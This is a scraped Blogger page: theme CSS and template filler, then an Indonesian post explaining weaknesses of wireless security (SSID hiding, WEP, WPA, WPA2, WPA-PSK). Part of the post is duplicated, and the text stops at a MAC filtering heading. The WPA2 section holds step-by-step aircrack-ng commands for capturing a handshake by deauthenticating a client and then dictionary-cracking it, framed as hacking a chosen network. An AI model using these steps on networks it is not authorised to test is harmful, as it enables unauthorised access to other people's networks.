{ cursor:url("http://i49.tinypic.com/flvjtl.gif"),text;
Sandiegoblogthemes. Version: 1.0 Author: Sandiegoblogthemes Author URI: http://www.sandiegoblogthemes.com/ Tags: dark, fixed width, two columns, right sidebar, threaded comments, widget ready, pagenavi, social bookmarking, valid xhtml, valid css */ .Navbar {display: none !important;} /* Variable definitions ==================== */ /* (CSS Start) */ /* Based on YUI http://developer.yahoo.com/yui/reset/ and Eric Meyer http://meyerweb.com/eric/tools/css/reset/index.html */ body, h1, h2, h3, h4, h5, h6, hr, p, blockquote, dl, dt, dd, ul, ol, li, pre, code, form, div, fieldset, legend, button, input, textarea, th, td { margin: 0; padding: 0; } fieldset, img { border: 0; } /* remember to define focus styles! */ :focus { outline: 0; } address, caption, cite, code, dfn, em, strong, th, var, optgroup { font-style: normal; font-weight: normal; } #blog_title ,.post_title ,h1 ,h2 ,h3 ,h4, h5, h6 { font-size: 100%; font-weight: normal; } abbr, acronym { border: 0; font-variant: normal; } input, button, textarea, select, optgroup, option { font-family: inherit; font-size: inherit; font-style: inherit; font-weight: inherit; } code, kbd, samp, tt { font-size: 100%; } /*@purpose To enable resizing for IE */ input, button, textarea, select { font-size: 100%; } body { line-height: 1.2; } ol, ul { list-style: none; } /* tables still need 'cellspacing="0"' in the markup */ table { border-collapse: collapse; border-spacing: 0; } caption, th { text-align: left; } sup, sub { font-size: 100%; vertical-align: baseline; } /* remember to highlight anchors and inserts somehow! */ ins { text-decoration: none; } blockquote, q { quotes: none; } blockquote:before, blockquote:after, q:before, q:after { content: ''; content: none; } /* Define */ h1 { font-size: 2.8em; } h2, h3, h4 { font-size: 2em; } a { text-decoration: none; } blockquote { margin: 5px 20px; padding: 5px; } blockquote p, code { padding: 10px 20px; display: block; } code { display: block; margin: 5px 20px; } strong, em, caption, th { font-style: normal; font-weight: bold; } cite { font-style: italic; font-weight: normal; } sub, sup { font-size: .8em; } sub { vertical-align: sub; } sup { vertical-align: super; } small { font-size: 1em; } :focus { outline: 1px #666 dotted; } input:focus, div:focus { outline: 0; } input { margin: 3px; vertical-align: middle; } /* Layout */ body { font-size: 62.5%; /* Resets 1em to 10px */ color: #000; background: #fff; line-height: 1.4; } #outer-wrapper , #wrap2 , #wrap4 , #header-wrapper , #content-wrapper , #footer-wrapper { margin: 0 auto; } #header-wrapper { position: relative; } /* Wordpress */ .entry p { margin: 10px 0 10px 0; } .entry ul { padding-left: 20px; list-style-type: square; } .entry ol { padding-left: 25px; list-style-type: decimal; } .entry h1, .entry h2, .entry h3, .entry h4, .entry h5, .entry h6 { font-weight: bold; margin: 5px 0; } acronym, abbr, span.caps { font-size: 0.9em; letter-spacing: .07em; cursor: help; border-bottom: 1px dashed #666; } .endline { clear: both; } /* Images */ p img { max-width: 100%; /* not working in IE6 */ } img.centered { display: block; margin-left: auto; margin-right: auto; } img.alignright { padding: 4px; margin: 0 0 2px 7px; display: inline; } img.alignleft { padding: 4px; margin: 0 7px 2px 0; display: inline; } .alignright { float: right; } .alignleft { float: left } /* Captions */ .aligncenter, div.aligncenter { display: block; margin-left: auto; margin-right: auto; } .wp-caption { border: 1px solid #ddd; text-align: center; background-color: #f3f3f3; padding-top: 4px; margin: 10px; } .wp-caption img { border: 0 none; } .wp-caption p.wp-caption-text { font-size: 11px; line-height: 17px; padding: 0 4px 5px; } /* Clear Fix */ .clearfix:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; } .clearfix { display: inline-block; } /* Hide from IE Mac \*/ .clearfix { display: block; } /* End hide from IE Mac */ /* end of clearfix */ /* Global */ body { color: #000; background: #202020; font-family: Verdana, Geneva, sans-serif; } a, .post a { text-decoration: none; color: #000; } a:hover, .post a:hover { color: #900; text-decoration: none; } #blog_title ,.post-title ,h1 ,h2 ,h3 ,h4 { font-family: Arial, Helvetica, sans-serif; font-weight: bold; } blockquote, code { color: #333; font-family: Verdana, Geneva, sans-serif; border: 1px dashed #999; } blockquote { background: #F8F4AB; } code { background: #F5D582; } /* Layout */ #outer-wrapper { min-width: 998px; /* not working in IE6 */ overflow: hidden; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFxodq0heiWjHoa1cN3dkgW7eI3fH3PV9stDyp_o3nI07dAiGS36JJTRTEwMJuN8SrfOY80-ft5q98gy5cYDEcW9SWMyR_poWcVSp7_ewOD7XPs-JEya7O3jdqV0T7hw-B8Kj_8EBfdnn1/s0/container_bg.jpg) center top repeat-y; } #wrap2 { padding: 0 0 5px 0; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjuR6RYqOloDk6Hb6zrxna4H0PBX0-upO8i15SFqFx0H2vu4fTBUL9BFC1kgKC3XNzt30E2QlBg8nDBYiXt7Ragy4KddwPz3fiRaEmaD58_t-vOLZvWqxSY6jiT63PAqqbdPYbiYv9bWKk/s0/bottom_frame.jpg) no-repeat center bottom; } #wrap4 { background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOOa3dzOX41uI7HHTD-7-1VI1-T3WEYRUBJurwvcK1Lbat05Q0R4uLSTQw8lILvDMk-0fOhOCeHq8WYbhW2e9zUFRPcPDulWhFISgl0Bq-NyU9P2HQaMiuyqyi8F3xUm2ySMrBS1lzd01L/s0/top_frame.jpg) no-repeat center top; } #wrap5 { margin: 0 auto; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCmgxP5RYwYi6hW8eGRfSX5psJe4Zhi-KXQ6Geu8yS_fHnXM3n5T81PNsH92VrS2BzQ3-jMVcijU2vjKXyG_Zwl0GJ4-o8qcUi6ptiu3ueW2v2q2zvYLeu7tZ1v6-QlsQzWYnz_94AEJA9/s0/top_container.jpg) no-repeat center 337px; } #header-wrapper , #content-wrapper , #footer-wrapper { width: 998px; } #header-wrapper { height: 238px; } #content-wrapper { padding: 0px 0 70px 0; } #footer-wrapper { clear: both; height: 50px; position: relative; } /* Footer */ .credit { font-size: 1.1em; text-align: center; padding: 0px 408px 0px 120px; } .credit, .credit a, .credit a:hover { color: #ccc; } /* Header */ #header-wrapper #blog_title { font-size: 3em; /* Blog title */ padding: 0px 336px 0 148px; text-align: left; color: #fff; } #header-wrapper #blog_title a { color: #fff; } #header-wrapper h2 { color: #fff; font-size: 1.4em; /* Blog Description */ text-align: left; padding: 0px 336px 0 150px; } /* menu */ #menu { width: 458px; height: 26px; position: absolute; left: 133px; top: 208px; overflow: hidden; } #menu ul li { padding: 0 14px; font-size: 1.4em; /* menu Font Size */ font-weight: bold; text-align: center; float: left; } #menu ul li a { padding: 0px 0 0px 0px; line-height: 2; color: #fff; } #menu ul li a:hover { color: #fc0; } #menu ul ul li { font-size: 1em; } /* searchform */ #searchform { overflow: hidden; position: absolute; right: 70px; top: 19px; } .searchtext { width: 128px; color: #000; border: 0; font-size: 1.2em; background: url(http://www.sandiegoblogthemes.com/examples/wp-content/themes/movie-buzz/images/spcaer.gif); padding: 0; margin: 7px 3px 0 0; float: left; } #searchsubmit { border: 0; margin: 0 0 0px 0; width: 25px; height: 25px; float: left; } #rss { position: absolute; left: 600px; top: 125px; } #rss img { width: 79px; height: 86px; } /* Content */ #main-wrapper { width: 537px; padding: 10px 0px 0 0px; display: inline; margin: 0px 0px 0px 64px; float: left; } .post { padding: 0px 0 0px 0; margin: 0px 0 30px 0px; } .post .post_header_bg { padding: 10px 0 24px 0; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKdxc2VXyQVNkPv1tV_ZC0_cQzb25wiRCD0ZmWgVtRLhIJF4yp66VQVVVi24_FKJ5F0tnNGLBX-VuudjCR60y-svJPihdS2Xi_L6pTF7KswnOSbypxx9tX4Z0WbtVXWFUhnTjbuW8N5r_F/s0/post_header_bg.jpg) no-repeat; } .post .post-title { margin: 0px 1px 0 0px; padding: 48px 10px 0px 80px; font-size: 1.4em; /* Post title */ } .post .post-title a { color: #490909; } .post .post-title a:hover { color: #900; } .post_path { font-size: 1.1em; margin: 0 0 0 80px; padding: 7px 7px 12px 15px; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQNxyXhDjuDkjaOQUnqo-PBet_CovNm3FjHtWhHJaz6nus-EyK8Tc4QTEIY1mio_PUsgewCkhFZnikbwq2k5f7nlLHg-BGG4xcKDRVEPTA4NI2Va6z4wD_ifQ0_d0s8ItMq1spuYUQjYiR/s0/arrow.gif) left 10px no-repeat; } .post_path span { color: #706ED6; } .post_path a:hover { text-decoration: underline; } .edit_post { width: 63%; margin: 0 auto; margin-top: 10px; padding: 5px 10px; background: #ffc; border: 1px dashed #999; } .edit_post a { font-style: italic; color: #33C; } .edit_post a.post-edit-link { margin-right: 15px; font-style: normal; color: #E5631C; text-decoration: underline; } .edit_post a:hover.post-edit-link { color: #33c; } .entry { width: 430px; overflow: hidden; margin: 0 auto; padding: 10px 0 10px 55px; font-size: 1.2em; } .entry a { color: #1f85da; text-decoration: underline; } .postmetadata { padding: 5px 10px 0 80px; text-align: right; font-size: 1.1em; } .postmetadata a { text-decoration: underline; } .tags, .tags a, .postmetadata, .postmetadata a { color: #193b90; } .tags { font-size: 1.2em; margin: 10px 30px 0 80px; } .tags a { text-decoration: underline; } .notfound { margin: 100px auto; text-align:center; font-size: 4em; font-weight: bold; color: #7e2d17; } .read_comments { margin: 0px 18px 0 0px; text-align: left; font-weight: bold; padding: 10px 30px 10px 80px; } .read_comments a { font-size: 1.2em; color: #6e4929; padding: 10px 25px 10px 0px; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgf5GaMwMDgGuXc46WdVKv2BiKBDBhG0C0-aTjmOP5mHFvOubo5ggSFTLb23uGqeZxXgQYCnKv00nKA9difCOxRVZTeNmNtPpfH2YuVJ-6QRqefdfwSnC2VZMv_Sss_OeDe2L47t1Ho0GWK/s0/read_comments.jpg) no-repeat right 8px; } .read_comments a:hover { color: #000; } .bookmark { margin: 18px 0 0 80px; } .wp-pagenavi { padding: 5px 36px 5px 80px; } /* welcome */ #welcome { color: #d3c7b7; font-weight: bold; font-size: 1.1em; padding: 92px 0 43px 0; } #welcome p { width: 152px; height: 138px; padding: 0px 0 0px 0px; overflow: hidden; } /* Sidebar */ #sidebar-wrapper { width: 152px; display: inline; padding: 0px 0px 280px 0px; margin: 0px 124px 0 0px; overflow: hidden; float: right; position: relative; color: #666; } #sidebar_main { padding: 0px 0 0px 0; margin: 0px 0 0 0; } #sidebar_main h2 { padding: 8px 10px 8px 18px; font-size: 18px; color: #925500; position: relative; background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8BN9BTpr5aHHlUU2dc-l-7ORELqGee3AmA5uPdhhzzMVlfAbPmRdmP-pNrf5PZihKkgFIKFFqtsWhjiO9BVarfjXSgHyVj8wkQIrYPoDVMmeFIdB1uow-QJrE1OeF6ZLs1lkZXhjQpHjP/s0/sidebar_header_bg.jpg) no-repeat left 4px; } #sidebar_main .widget { overflow: hidden; font-size: 1.2em; padding: 3px 5px 15px 5px; } #sidebar_main ul li a { color: #6c5240; } #sidebar_main ul li a:hover { color: #fc0; } #sidebar_main .widget-content { padding: 0 0 0 0px; background: none; } #Feed1, #Feed2 {margin-top: 15px;} #sidebar_main ul ul li { font-size: 1em; border: none; padding: 6px 0 6px 18px; background: url(http://www.sandiegoblogthemes.com/examples/wp-content/themes/movie-buzz/images/sidebar_li.jpg) no-repeat left 6px; position: relative; } #sidebar_main ul ul ul { padding: 0; margin: 0; } #sidebar_main ul ul li li { font-size: 1em; padding: 6px 0 0px 18px; width: 85%; } #sidebar_main .textwidget { margin: 7px 0; } #sidebar-wrapper select { font-size: 1em; margin: 7px 0; width: 95%; } #sidebar-wrapper ul li div ,#sidebar_ul li object { padding: 0 5px; } #sidebar-wrapper ul li div div { padding: 0; } /* Sidebar sub */ #sidebar_sub { width: 165px; height: 225px; overflow: hidden; position: absolute; right: 135px; bottom: 19px; margin: 0px 0 0px 0px; padding: 0px 0 0px 0px; } #sidebar_sub a { color: #543b26; } #sidebar_sub a:hover { color:#fc0; } #sidebar_sub h2 { display: none; } #sidebar_sub h2 span { width: 0; height: 0; display: block; overflow: hidden; } #sidebar_sub .recent_posts { } #sidebar_sub .recent_comments { padding-top: 40px; } #sidebar_sub .widget { font-size: 1.2em; white-space: nowrap; overflow: hidden; height: 48px; padding: 0px 0px 30px 0px; position: relative; } #sidebar_sub .widget-content { padding: 0px 0px 0 10px; margin: 0; } #sidebar_sub ul ul li { font-size: 1em; height: 13px; padding: 3px 0 3px 15px; background: url(http://www.sandiegoblogthemes.com/examples/wp-content/themes/movie-buzz/images/sidebar_sub_li.gif) no-repeat left 9px; } #sidebar_sub ul ul ul { margin: 0; padding: 0; background: none; } #sidebar_sub ul ul ul li { width: 85%; padding-left: 15px; } /* PageNavi*/ .wp-pagenavi a { padding: 2px 4px; margin: 2px; text-decoration: none; border: 1px solid #06c; color: #06c; background-color: #fff; } .wp-pagenavi a:hover { border: 1px solid #000; color: #000; } .wp-pagenavi span.pages, .wp-pagenavi span.current, .wp-pagenavi span.extend { padding: 2px 4px; margin: 2px; border: 1px solid #000; color: #000; background-color: #fff; } /* Calendar */ #wp-calendar { empty-cells: show; margin: 10px auto 0; width: 90%; } #wp-calendar #next a { padding-right: 10px; text-align: right; font-size: 11px; } #wp-calendar #prev a { padding-left: 10px; text-align: left; font-size: 11px; } #wp-calendar a { display: block; font-weight: bold; text-decoration: none; } #wp-calendar a:hover { background: #ccc; color: #fff; } #wp-calendar caption { text-align: center; width: 100%; font: bold 13px Verdana, Arial, Sans-Serif; } #wp-calendar td { text-align: center; padding: 3px 0; font-size: 12px; text-align: center; } #wp-calendar th { text-align: center; font-style: normal; font-size: 12px; text-transform: capitalize; } /* Social Bookmarking */ .bookmark ul { display: inline; } .bookmark ul li { background: none; display: inline; list-style-type: none; } .bookmark_line img { border: 0; } /* Comments */ h3#comments { padding: 0 0 0 46px; } h3#comments, #respond h3 { padding-top: 10px; font-size: 1.4em; color: #333; } #commentform { margin: 5px 0 0 0px; } #commentform input { width: 170px; padding: 2px; margin: 5px 5px 1px 0; font: 0.9em 'Lucida Grande', Verdana, Arial, Sans-Serif; } #commentform textarea { width: 98%; padding: 2px; font: 0.9em 'Lucida Grande', Verdana, Arial, Sans-Serif; } #commentform p { margin: 5px 0; font-family: 'Lucida Grande', Verdana, Arial, Sans-Serif; } #commentform #submit { margin: 0 0 5px auto; float: right; } #respond { width: 85%; padding: 0 0 0 10px; color: #333; margin: 0 auto; } #respond:after { content: "."; display: block; height: 0; clear: both; visibility: hidden; } .commentlist { padding: 0 0 0 0px; margin: 0 auto; width: 85%; } .commentlist li { margin: 15px 0 0px; padding: 5px 5px 10px 10px; list-style: none; font-weight: bold; font: 0.9em 'Lucida Grande', Verdana, Arial, Sans-Serif; } .commentlist li ul li { margin-right: -5px; margin-left: 10px; font-size: 1em; } .commentlist p { margin: 10px 5px 10px 0; font-weight: normal; line-height: 1.5em; font-size: 1.2em; text-transform: none; } .commentlist li .avatar { float: right; border: 1px solid #333; padding: 2px; background: #fff; } .commentlist li a { color: #000; } .commentlist cite, .commentlist cite a { font-weight: bold; font-style: normal; font-size: 1.2em; } #main-wrapper .comment-body p a { text-decoration: underline; } .nocomments { text-align: center; } .commentmetadata { font-size: 1.2em; display: block; font-weight: normal; } .thread-alt { background-color: #dcbea4; } .thread-even { background-color: #e3cbb3; } .depth-1 { border: 1px solid #000; } .alt { border-left: 1px solid #666; /* odd page */ background-color: #C29581; padding: 10px; } .even { border-left: 1px solid #666; /* even page */ background-color: #D0AD9E; } .edit_post { color: #666; } /* For Blogger */ #sidebar_main ul li div { padding: 0; margin:0; } #sidebar_main ul ul { background: none; } #sidebar_sub ul li div { padding: 0; margin: 0;} #comments { width: 85%; margin: 0 auto;} #sidebar_sub h2 { line-height: 12px; } #sidebar-wrapper #sidebar-main { margin: 0; padding: 0; } #sidebar_sub #sidebar-sub { margin: 0; padding: 0; } #welcome1 .widget { padding: 0; margin: 0; } #sidebar-wrapper #ArchiveList ul li { padding-left: 0; } #sidebar-wrapper #ArchiveList ul ul li { padding-left: 15px; } body#layout #searchform { display: none; } body#layout #rss { display: none; } .post-footer { padding: 10px 80px; } #ArchiveList ul li {text-indent: 0!important;} #comments { padding-left: 15px; } #comments h4 { margin:1em 0; font-weight: bold; font-size: 1.2em; line-height: 1.4em; text-transform:uppercase; letter-spacing:.2em; color: $sidebarcolor; } #comments-block { margin:1em 0 1.5em; line-height:1.6em; } #comments-block .comment-author { margin:.5em 0; } #comments-block .comment-body { margin:.25em 0 0; } #comments-block .comment-footer { margin:-.25em 0 2em; line-height: 1.4em; text-transform:uppercase; letter-spacing:.1em; } #comments-block .comment-body p { margin:0 0 .75em; } .deleted-comment { font-style:italic; color:gray; } #blog-pager-newer-link { float: $startSide; } #blog-pager-older-link { float: $endSide; } #blog-pager { padding: 0 15px; text-align: center; } .feed-links { display:none; } /* (CSS End) */ ]]> '/> '/>
rss

This is default featured post 1 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 2 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 3 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 4 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

This is default featured post 5 title

Go to Blogger edit html and find these sentences.Now replace these sentences with your own descriptions.

14/01/13

Kelemahan Security Pada WLAN

Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Salah satu contoh penyebab kelemahan pada konfigurasi karena saat ini untuk membangun sebuah jaringan wireless cukup mudah. Banyak vendor yang menyediakan fasilitas yang memudahkan pengguna atau admin jaringan sehingga sering ditemukan wireless yang masih menggunakan konfigurasi wireless default bawaan vendor. Penulis sering menemukan wireless yang dipasang pada jaringan masih menggunakan setting default bawaan vendor seperti SSID, IP Address , remote manajemen, DHCP enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut. WEP (Wired Equivalent Privacy) yang menjadi standart keamanan wireless sebelumnya, saat ini dapat dengan mudah dipecahkan dengan berbagai tools yang tersedia gratis di internet. WPAPSK dan LEAP yang dianggap menjadi solusi menggantikan WEP, saat ini juga sudah dapat dipecahkan dengan metode dictionary attack secara offline.
Sebelum membahas tentang kelemahan security pada WLAN (Wireless), kita perlu mengetahui macam macam security pada WLAN, diantaranya adalah
  • IP DEFAULT
  • SSID
  • WEP
  • WPA (WPA1,WPA2)
  • WPA-PSK
  • MAC FILTERING

1. IP DEFAULT
Kelemahan jika kita menggunakan IP default adalah, banyaknya oknum yang tidak bertanggung jawab merubah settingan AP yang kita gunakan, sehingga merugikan user lain.
2. SSID
SSID digunakan sebagai metode untuk otentikasi. Namun tidaklah mencukupi hanya mengandalkan SSID untuk jaringan WLAN yang cukup besar. Semakin banyak pengguna yang mengetahui SSID ini, akan semakin besar pula kemungkinan penyalahgunaannya. Bisa saja administrator secara rutin mengubah password (SSID) ini secara rutin. Namun dalam jaringan yang besar hal ini akan memerlukan usaha yang besar pula dan tidak praktis. Selain itu pada kenyataannya kebanyak AP secara default mem-broadcast SSID dalam sinyal WLAN. Juga banyak terdapat AP yang masih menggunakan nilai default SSID yang diberikan oleh pabrik pembuat. Padahal daftar default SSID ini dapat dengan mudah diperoleh siapa saja di Internet. Hal ini akan sangat memudahkan pihak lain yang tidak dikehendaki dapat mengakses atau menyerang WLAN tersebut.
Biasanya, pada jaringan WLAN yang tidak public para administrator menyembunyikan SSIDnya. selain untuk mencegah banyak user lain yang tidak berkepentingannya terkoneksi, tapi juga mencegah terjadinya hacking dari oknum tidak bertanggung jawab. namun Hal ini tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri (deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam bentuk plain text (meskipun menggunakan enkripsi), sehingga jika bermaksud menyadapnya, dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang dihidden antara lain, kismet (kisMAC), ssid_jack (airjack), aircrack , void11 dan masih banyak lagi.

Kelemahan Security Pada WLAN (Wireless)

Kelemahan jaringan wireless secara umum dapat dibagi menjadi 2 jenis, yakni kelemahan pada konfigurasi dan kelemahan pada jenis enkripsi yang digunakan. Salah satu contoh penyebab kelemahan pada konfigurasi karena saat ini untuk membangun sebuah jaringan wireless cukup mudah. Banyak vendor yang menyediakan fasilitas yang memudahkan pengguna atau admin jaringan sehingga sering ditemukan wireless yang masih menggunakan konfigurasi wireless default bawaan vendor. Penulis sering menemukan wireless yang dipasang pada jaringan masih menggunakan setting default bawaan vendor seperti SSID, IP Address , remote manajemen, DHCP enable, kanal frekuensi, tanpa enkripsi bahkan user/password untuk administrasi wireless tersebut. WEP (Wired Equivalent Privacy) yang menjadi standart keamanan wireless sebelumnya, saat ini dapat dengan mudah dipecahkan dengan berbagai tools yang tersedia gratis di internet. WPAPSK dan LEAP yang dianggap menjadi solusi menggantikan WEP, saat ini juga sudah dapat dipecahkan dengan metode dictionary attack secara offline.
Sebelum membahas tentang kelemahan security pada WLAN (Wireless), kita perlu mengetahui macam macam security pada WLAN, diantaranya adalah
  • IP DEFAULT
  • SSID
  • WEP
  • WPA (WPA1,WPA2)
  • WPA-PSK
  • MAC FILTERING

1. IP DEFAULT
Kelemahan jika kita menggunakan IP default adalah, banyaknya oknum yang tidak bertanggung jawab merubah settingan AP yang kita gunakan, sehingga merugikan user lain.
2. SSID
SSID digunakan sebagai metode untuk otentikasi. Namun tidaklah mencukupi hanya mengandalkan SSID untuk jaringan WLAN yang cukup besar. Semakin banyak pengguna yang mengetahui SSID ini, akan semakin besar pula kemungkinan penyalahgunaannya. Bisa saja administrator secara rutin mengubah password (SSID) ini secara rutin. Namun dalam jaringan yang besar hal ini akan memerlukan usaha yang besar pula dan tidak praktis. Selain itu pada kenyataannya kebanyak AP secara default mem-broadcast SSID dalam sinyal WLAN. Juga banyak terdapat AP yang masih menggunakan nilai default SSID yang diberikan oleh pabrik pembuat. Padahal daftar default SSID ini dapat dengan mudah diperoleh siapa saja di Internet. Hal ini akan sangat memudahkan pihak lain yang tidak dikehendaki dapat mengakses atau menyerang WLAN tersebut.
Biasanya, pada jaringan WLAN yang tidak public para administrator menyembunyikan SSIDnya. selain untuk mencegah banyak user lain yang tidak berkepentingannya terkoneksi, tapi juga mencegah terjadinya hacking dari oknum tidak bertanggung jawab. namun Hal ini tidaklah benar, karena SSID sebenarnya tidak dapat disembuyikan secara sempurna. Pada saat saat tertentu atau khususnya saat client akan terhubung (assosiate) atau ketika akan memutuskan diri (deauthentication) dari sebuah jaringan wireless, maka client akan tetap mengirimkan SSID dalam bentuk plain text (meskipun menggunakan enkripsi), sehingga jika bermaksud menyadapnya, dapat dengan mudah menemukan informasi tersebut. Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang dihidden antara lain, kismet (kisMAC), ssid_jack (airjack), aircrack , void11 dan masih banyak lagi.
3. WEP (Wired Equivalent Privacy)
WEP memiliki beberapa kelemahan
  • Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
  • WEP menggunakan kunci yang bersifat statis
  • Masalah initialization vector (IV) WEP
  • Masalah integritas pesan Cyclic Redundancy Check (CRC32)
WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV). Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit. Seranganserangan pada kelemahan WEP antara lain :
  1. Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara mengumpulkan IV yang lemah sebanyakbanyaknya. Semakin banyak IV lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan
  2. Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang lemah dalam melakukan cracking WEP.
  3. Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk mempersingkat waktu, para hacker biasanya melakukan traffic injection. Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan packet ARP kemudian mengirimkan kembali ke access point. Hal ini mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang ditemui di tokotoko, mulai dari chipset, versi firmware, dan versidriver serta tidak jarang harus melakukan patching terhadap driver dan aplikasinya.4. WPA (Wireless Protected Access)
    Metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP.
    Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC). Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing-masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.
    Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:
    * Server
    o Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.
    * Port
    o Nomor port yang digunakan adalah 1812.
    * Shared Secret
    o Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.
    Setelah komputer diinstall perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client. Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.
    5. WPA2 (Wireless Protected Access)
    WPA2 adalah sertifikasi produk yang tersedia melalui Wi-Fi Alliance. WPA2 Sertifikasi hanya menyatakan bahwa peralatan nirkabel yang kompatibel dengan standar IEEE 802.11i. WPA2 sertifikasi produk yang secara resmi menggantikan wired equivalent privacy (WEP) dan fitur keamanan lain yang asli standar IEEE 802.11. WPA2 tujuan dari sertifikasi adalah untuk mendukung wajib tambahan fitur keamanan standar IEEE 802.11i yang tidak sudah termasuk untuk produk-produk yang mendukung WPA.
    Update WPA2/WPS IE yang mendukung WPA2 fitur berikut:
    * WPA2 Enterprise IEEE 802.1X menggunakan otentikasi dan WPA2 Personal menggunakan tombol preshared (PSK).
    Untuk kelemahannya, WPA, WPA2, dan WPA/PSK dapat dihack menggunakan tools dapat digunakan sampai saat ini yaitu CoWPAtty (http://www.churchofwifi.org/ ) dan aircrack (http://www.aircrackng.org). atau jika dapat menggunakan backtrack dengan turtor berikut.
    root@bt:-# airmon-ng
    root@bt:-# airmon-ng stop wlan0
    root@bt:-# airmon-ng start wlan0
    root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian ch yaitu berarti chanel yg harus di ingat)
    root@bt:-# airodump-ng -c 6 -w zhome –bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack, setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka terminal kedua dan ketikan)
    root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard ctrl+c)
    root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de adalah dictionary passpharase bawaan backtrack 4)
    6. WPA-PSK(Wi-Fi Protected Access – Pre Shared Key)
    Pengamanan jaringan nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.
    Pada access point Dlink DWL-2000AP, pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang digunakan. Keadaan ini berbanding terbalik dengan akses point Linksys WRT54G, dimana administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari algoritma TKIP atau algoritma AES.

    7. MAC FILTERING
